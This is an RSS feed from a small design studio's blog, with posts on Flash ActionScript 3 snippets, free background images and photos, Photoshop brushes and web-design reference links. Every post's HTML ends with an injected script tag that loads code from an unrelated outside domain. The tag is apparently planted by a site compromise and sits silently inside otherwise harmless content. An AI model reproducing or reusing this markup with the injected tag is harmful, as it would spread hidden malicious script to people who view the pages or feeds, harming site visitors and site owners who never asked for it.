<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Official Design and Development Resource of ThornyRabbit</title>
	<atom:link href="http://blog.thornyrabbit.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.thornyrabbit.com</link>
	<description>because we love</description>
	<lastBuildDate>Fri, 19 Mar 2010 16:55:29 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
		<item>
		<title>Child listen for parent click event in Flash AS3 &#8211; summed up.</title>
		<link>http://blog.thornyrabbit.com/2010/03/child-listen-for-parent-click-event-in-flash-as3-summed-up/</link>
		<comments>http://blog.thornyrabbit.com/2010/03/child-listen-for-parent-click-event-in-flash-as3-summed-up/#comments</comments>
		<pubDate>Fri, 19 Mar 2010 16:40:03 +0000</pubDate>
		<dc:creator>Michele</dc:creator>
				<category><![CDATA[Flash]]></category>
		<category><![CDATA[Flash ActionScript 3 AS3 child parent]]></category>

		<guid isPermaLink="false">http://blog.thornyrabbit.com/2010/03/child-listen-for-parent-click-event-in-flash-as3-summed-up/</guid>
		<description><![CDATA[In the child script: (An error will occur if the child has not been fully added to stage &#8211; so make sure you have the following) addEventListener(Event.ADDED_TO_STAGE, setListener); added in the initialiser, that then will check for parent events, eg. private function setListener(event:Event):void{ this.parent.addEventListener(MouseEvent.CLICK, listenForClick); } In the parent script: Retrieve the value via, eg: [...]]]></description>
			<content:encoded><![CDATA[<p>In the child script:<br />
(An error will occur if the child has not been fully added to stage &#8211; so make sure you have the following)</p>
<p>		  addEventListener(Event.ADDED_TO_STAGE, setListener);</p>
<p>added in the initialiser, that then will check for parent events, eg.</p>
<p>	   private function setListener(event:Event):void{<br />
		    this.parent.addEventListener(MouseEvent.CLICK, listenForClick);<br />
	   }</p>
<p>In the parent script:</p>
<p>Retrieve the value via, eg:</p>
<p>	private function listenForClick(event:Event):void{<br />
		trace(&#8220;parent said click&#8221; + event.target.videoName);<br />
//but to check right object is sending the event and not any click, use:<br />
if(event.target.name == &#8220;menuItem_mc&#8221;){<br />
				videoURL =  event.target.videoName;<br />
				doConnection();<br />
			}<br />
	}//listenForClick<script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.thornyrabbit.com/2010/03/child-listen-for-parent-click-event-in-flash-as3-summed-up/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Garmin Connect &#8211; Activity Details for Parksville Dog Park</title>
		<link>http://blog.thornyrabbit.com/2010/03/garmin-connect-activity-details-for-parksville-dog-park/</link>
		<comments>http://blog.thornyrabbit.com/2010/03/garmin-connect-activity-details-for-parksville-dog-park/#comments</comments>
		<pubDate>Wed, 03 Mar 2010 22:05:29 +0000</pubDate>
		<dc:creator>Michele</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://blog.thornyrabbit.com/?p=316</guid>
		<description><![CDATA[Garmin Connect &#8211; Activity Details for Parksville Dog Park.]]></description>
			<content:encoded><![CDATA[<p><a href="http://connect.garmin.com/activity/25960738">Garmin Connect &#8211; Activity Details for Parksville Dog Park</a>.<script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.thornyrabbit.com/2010/03/garmin-connect-activity-details-for-parksville-dog-park/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Flash FullScreen Video</title>
		<link>http://blog.thornyrabbit.com/2010/03/flash-fullscreen-video/</link>
		<comments>http://blog.thornyrabbit.com/2010/03/flash-fullscreen-video/#comments</comments>
		<pubDate>Wed, 03 Mar 2010 20:44:47 +0000</pubDate>
		<dc:creator>Michele</dc:creator>
				<category><![CDATA[Flash]]></category>
		<category><![CDATA[flash actionscript video]]></category>

		<guid isPermaLink="false">http://blog.thornyrabbit.com/2010/03/flash-fullscreen-video/</guid>
		<description><![CDATA[Always forget this &#8211; if you want to have fullscreen Flash video toggle (normally a button in the player skin) &#8211; when you publish you need to make 2 changes to the HTML options: 1. Set &#8220;Template&#8221; to Flash Only &#8211; FullScreen 2. Set Scale to &#8220;No scale&#8221; &#8211; this will allow the scaling (!!)]]></description>
			<content:encoded><![CDATA[<p>Always forget this &#8211; if you want to have fullscreen Flash video toggle (normally a button in the player skin) &#8211; when you publish you need to make 2 changes to the HTML options:<br />
1. Set &#8220;Template&#8221; to Flash Only &#8211; FullScreen<br />
2. Set Scale to &#8220;No scale&#8221; &#8211; this will allow the scaling (!!)<br />
<script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.thornyrabbit.com/2010/03/flash-fullscreen-video/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Water with Bubbles Free Background Image</title>
		<link>http://blog.thornyrabbit.com/2009/12/water-with-bubbles-free-background-image/</link>
		<comments>http://blog.thornyrabbit.com/2009/12/water-with-bubbles-free-background-image/#comments</comments>
		<pubDate>Tue, 15 Dec 2009 21:12:05 +0000</pubDate>
		<dc:creator>thornyeternity</dc:creator>
				<category><![CDATA[Freebies]]></category>
		<category><![CDATA[background image pattern water]]></category>

		<guid isPermaLink="false">http://blog.thornyrabbit.com/?p=307</guid>
		<description><![CDATA[]]></description>
			<content:encoded><![CDATA[<p><div id="attachment_306" class="wp-caption alignnone" style="width: 310px"><a href="http://blog.thornyrabbit.com/wp-content/uploads/2009/12/gossamer.jpg"><img class="size-medium wp-image-306" title="Gossamer - Streaming Bubble Background" src="http://blog.thornyrabbit.com/wp-content/uploads/2009/12/gossamer-300x300.jpg" alt="free watery background image" width="300" height="300" /></a>1600 x 1600 Gossamer &#8211; Streaming Bubble Background, free delicate and ethereal abstract watery image for site backgrounds, texture overlays and so on.<p class="wp-caption-text">free watery background image</p></div><script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.thornyrabbit.com/2009/12/water-with-bubbles-free-background-image/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Looping an FLV video</title>
		<link>http://blog.thornyrabbit.com/2009/12/looping-an-flv-video/</link>
		<comments>http://blog.thornyrabbit.com/2009/12/looping-an-flv-video/#comments</comments>
		<pubDate>Mon, 07 Dec 2009 23:31:28 +0000</pubDate>
		<dc:creator>thornyeternity</dc:creator>
				<category><![CDATA[ActionScript 3 Snippets]]></category>
		<category><![CDATA[Code]]></category>
		<category><![CDATA[Flash]]></category>
		<category><![CDATA[AS3 flash video]]></category>

		<guid isPermaLink="false">http://blog.thornyrabbit.com/2009/12/looping-an-flv-video/</guid>
		<description><![CDATA[FLV Playback component is named &#8220;myvideo&#8221; myvideo.addEventListener(Event.COMPLETE, doLoop); function doLoop(event:Event):void{ myvideo.autoRewind=true; myvideo.play(); }]]></description>
			<content:encoded><![CDATA[<p>FLV Playback component is named &#8220;myvideo&#8221;</p>
<p>myvideo.addEventListener(Event.COMPLETE, doLoop);<br />
function doLoop(event:Event):void{<br />
	myvideo.autoRewind=true;<br />
	myvideo.play();<br />
}<script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.thornyrabbit.com/2009/12/looping-an-flv-video/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Broken Glass Seamless Tile &#8211; free download</title>
		<link>http://blog.thornyrabbit.com/2009/11/broken-glass-seamless-tile-free-download/</link>
		<comments>http://blog.thornyrabbit.com/2009/11/broken-glass-seamless-tile-free-download/#comments</comments>
		<pubDate>Wed, 25 Nov 2009 00:06:22 +0000</pubDate>
		<dc:creator>thornyeternity</dc:creator>
				<category><![CDATA[Freebies]]></category>
		<category><![CDATA[seamless tile]]></category>

		<guid isPermaLink="false">http://blog.thornyrabbit.com/?p=294</guid>
		<description><![CDATA[1118 x 746 pixel abstract image made from broken glass to use as a seamless tiling background image, texture overlay or such.]]></description>
			<content:encoded><![CDATA[<p>1118 x 746 pixel abstract image made from broken glass to use as a seamless tiling background image, texture overlay or such.</p>
<p><a href="http://blog.thornyrabbit.com/wp-content/uploads/2009/11/faded_broken1.jpg"><img class="alignnone size-medium wp-image-295" title="faded_broken" src="http://blog.thornyrabbit.com/wp-content/uploads/2009/11/faded_broken-300x200.jpg" alt="faded_broken" width="300" height="200" /></a><script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.thornyrabbit.com/2009/11/broken-glass-seamless-tile-free-download/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>33 Marker Pen &amp; Pencil Textured Scratch Brushes</title>
		<link>http://blog.thornyrabbit.com/2009/11/33-marker-pen-pencil-textured-scratch-brushes/</link>
		<comments>http://blog.thornyrabbit.com/2009/11/33-marker-pen-pencil-textured-scratch-brushes/#comments</comments>
		<pubDate>Mon, 23 Nov 2009 16:02:01 +0000</pubDate>
		<dc:creator>Michele</dc:creator>
				<category><![CDATA[Design]]></category>
		<category><![CDATA[featured]]></category>
		<category><![CDATA[photoshop brushes]]></category>

		<guid isPermaLink="false">http://blog.thornyrabbit.com/?p=285</guid>
		<description><![CDATA[One of our latest creations. 33 different brushes – defined as a Photoshop set of brushes (ABR), a layered psd and a set of transparent pngs included, plus short help file. Brushes range in size from well over 2000 pixels to over 600 and are created at 600 dpi. Each brush is a useful for [...]]]></description>
			<content:encoded><![CDATA[<p>One of our latest creations. 33 different brushes – defined as a Photoshop set of brushes (ABR), a layered psd and a set of transparent pngs included, plus short help file. Brushes range in size from well over 2000 pixels to over 600 and are created at 600 dpi. Each brush is a useful for borders, texture overlays or patterns as a single brush, or using brush presets can scatter to create cool effects like stitching, grass or whatever. Scanned from pencil and marker pen doodles, they retain a texture reflecting the original media, making for a hand painted result that is organic and natural.</p>
<p>Available for purchase on <a href="http://graphicriver.net/item/33-marker-pen-pencil-textured-scratch-brushes/69427" target="_blank">Graphic River</a><script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.thornyrabbit.com/2009/11/33-marker-pen-pencil-textured-scratch-brushes/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Landscapes &#8211; free photos for download</title>
		<link>http://blog.thornyrabbit.com/2009/10/landscapes/</link>
		<comments>http://blog.thornyrabbit.com/2009/10/landscapes/#comments</comments>
		<pubDate>Sat, 24 Oct 2009 18:26:12 +0000</pubDate>
		<dc:creator>Michele</dc:creator>
				<category><![CDATA[Freebies]]></category>

		<guid isPermaLink="false">http://blog.thornyrabbit.com/?p=269</guid>
		<description><![CDATA[We have found that a lot of the time you work on a design for a client and you need a photograph of a certain area, like a city or town. Here are some photos of landscapes and cityscapes that are available for download. You can use these in anything you like &#8211; web design, [...]]]></description>
			<content:encoded><![CDATA[<p>We have found that a lot of the time you work on a design for a client and you need a photograph of a certain area, like a city or town. Here are some photos of landscapes and cityscapes that are available for download. You can use these in anything you like &#8211; web design, print etc. All the photos are taken with a DSLR, but have not been retouched, so you might have to do a bit of work on them.</p>
<p><a href="http://blog.thornyrabbit.com/wp-content/uploads/2009/10/Cape-Town-Waterfront-large.JPG" target="_blank"><img class="alignnone size-full wp-image-271" title="Cape-Town-Waterfront-preview" src="http://blog.thornyrabbit.com/wp-content/uploads/2009/10/Cape-Town-Waterfront-preview.jpg" alt="Cape-Town-Waterfront-preview" width="430" height="287" /></a></p>
<p><a href="http://blog.thornyrabbit.com/wp-content/uploads/2009/10/Cape-Town-Waterfront-large.JPG" target="_blank">Waterfront, Cape Town, South Africa (file:3456 x 2304)</a></p>
<p><a href="http://blog.thornyrabbit.com/wp-content/uploads/2009/10/scaburough-large.JPG" target="_blank"><img class="alignnone size-full wp-image-271" title="Cape-Town-Waterfront-preview" src="http://blog.thornyrabbit.com/wp-content/uploads/2009/10/scaburough_preview.jpg" alt="Scaburough Preview" width="430" height="287" /></a></p>
<p><a href="http://blog.thornyrabbit.com/wp-content/uploads/2009/10/scaburough-large.JPG" target="_blank">Scaburough, Cape Town, South Africa (file:3456 x 2304)</a></p>
<p><a href="http://blog.thornyrabbit.com/wp-content/uploads/2009/10/Toronto-large.JPG" target="_blank"><img class="alignnone size-full wp-image-271" title="Toronto-preview" src="http://blog.thornyrabbit.com/wp-content/uploads/2009/10/Toronto-preview.jpg" alt="Toronto Preview" width="287" height="430" /></a></p>
<p><a href="http://blog.thornyrabbit.com/wp-content/uploads/2009/10/Toronto-large.JPG" target="_blank">Taken from the CN Tower, Toronto, Canada (file:2304 x 3456 )</a></p>
<p><a href="http://blog.thornyrabbit.com/wp-content/uploads/2009/10/Scaburough-Roadside-01-large.JPG" target="_blank"><img class="alignnone size-full wp-image-271" title="Scaburough Roadside Preview" src="http://blog.thornyrabbit.com/wp-content/uploads/2009/10/Scaburough-Roadside-01-preview.jpg" alt="Scaburough Roadside Preview" width="287" height="430" /></a></p>
<p><a href="http://blog.thornyrabbit.com/wp-content/uploads/2009/10/Scaburough-Roadside-01-large" target="_blank">Scaburough, Cape Town, South Africa (file:2304 x 3456 )</a><script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.thornyrabbit.com/2009/10/landscapes/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Brochure Open Engine</title>
		<link>http://blog.thornyrabbit.com/2009/10/brochure-open-engine/</link>
		<comments>http://blog.thornyrabbit.com/2009/10/brochure-open-engine/#comments</comments>
		<pubDate>Fri, 02 Oct 2009 01:08:07 +0000</pubDate>
		<dc:creator>Michele</dc:creator>
				<category><![CDATA[Code]]></category>
		<category><![CDATA[Flash]]></category>
		<category><![CDATA[ActionScript 3]]></category>
		<category><![CDATA[featured]]></category>

		<guid isPermaLink="false">http://blog.thornyrabbit.com/?p=233</guid>
		<description><![CDATA[This is one of the earlier items we uploaded to Flashden, but it has proved to be reasonabily popular, so I thought I would highlight it. It is a pretty nifty little flash movie, that is kinda like the evil flash flipping book. I hate flipping books, although it does work in places, for example [...]]]></description>
			<content:encoded><![CDATA[<p>This is one of the earlier items we uploaded to Flashden, but it has proved to be reasonabily popular, so I thought I would highlight it. It is a pretty nifty little flash movie, that is kinda like the evil flash flipping book. I hate flipping books, although it does work in places, for example on the <a href="http://www.Blurb.com" target="_blank">www.Blurb.com</a> site.</p>
<p>What I like about this is that you can have more of a brochure instead of a magazine / book as a lot of the time one tends to create brochures more and also it is a bit more unique. Andrew coded this in ActionScript 3 and since he knows far more than I do about the subject I will not go into the technical aspects of it.</p>
<p><a href="http://flashden.net/item/brochure-open-engine/40619"><img class="alignnone size-full wp-image-258" title="bunnies" src="http://blog.thornyrabbit.com/wp-content/uploads/2009/10/bunnies1.jpg" alt="bunnies" width="400" height="203" /></a></p>
<p><strong>In summary this is what it does:</strong></p>
<p>Brochure Open Engine uses 6 images in the library to create an interactive animated brochure opening, flipping over, and closing.The images can be easily replaced (provided the symbols are kept centered). File size is dependent on the size of the images used. All symbols are editable in the Library. Size is fixed based on the required area to display the full brochure, user can adjust as needed.</p>
<p>If you like the sounds of it have a look on <a href="http://flashden.net/item/brochure-open-engine/40619" target="_blank">Flashden</a>, and even better you can always buy it!<script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.thornyrabbit.com/2009/10/brochure-open-engine/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Useful CSS, Jquery &amp; HTML references</title>
		<link>http://blog.thornyrabbit.com/2009/09/useful-jquery-references/</link>
		<comments>http://blog.thornyrabbit.com/2009/09/useful-jquery-references/#comments</comments>
		<pubDate>Tue, 29 Sep 2009 15:33:37 +0000</pubDate>
		<dc:creator>Michele</dc:creator>
				<category><![CDATA[Code]]></category>
		<category><![CDATA[CSS]]></category>
		<category><![CDATA[Html]]></category>
		<category><![CDATA[Jquery]]></category>

		<guid isPermaLink="false">http://blog.thornyrabbit.com/?p=231</guid>
		<description><![CDATA[I am always finding tutorials or references, but by the time I want to use them I can&#8217;t ever seem to find them.  I am starting this page so I can keep track of them, hopefully this way I will manage to find them again when I need them. Smashing Magazine 50 useful new jquery [...]]]></description>
			<content:encoded><![CDATA[<p>I am always finding tutorials or references, but by the time I want to use them I can&#8217;t ever seem to find them.  I am starting this page so I can keep track of them, hopefully this way I will manage to find them again when I need them.</p>
<p><strong>Smashing Magazine</strong></p>
<ul>
<li><a href="http://www.smashingmagazine.com/2009/08/23/50-useful-new-jquery-techniques/" target="_blank">50 useful new jquery techniques</a></li>
<li><a href="http://www.smashingmagazine.com/2009/01/15/45-new-jquery-techniques-for-a-good-user-experience/" target="_blank">45 new jquery techniques for-a good user experience</a></li>
<li><a href="http://buildinternet.com/2009/11/making-an-interactive-picture-with-jquery/" target="_blank">Making an interactive picture with jquery</a></li>
</ul>
<p><strong>CSS</strong></p>
<ul>
<li><a href="http://css-tricks.com/perfect-full-page-background-image/" target="_blank">Perfect Full Page Background Image</a></li>
</ul>
<p><strong>Design Related</strong></p>
<ul>
<li><a href="http://buildinternet.com/2009/07/fonts-used-in-logos-of-popular-websites/" target="_blank">fonts-used-in-logos-of-popular-websites</a></li>
</ul>
<p><script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.thornyrabbit.com/2009/09/useful-jquery-references/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
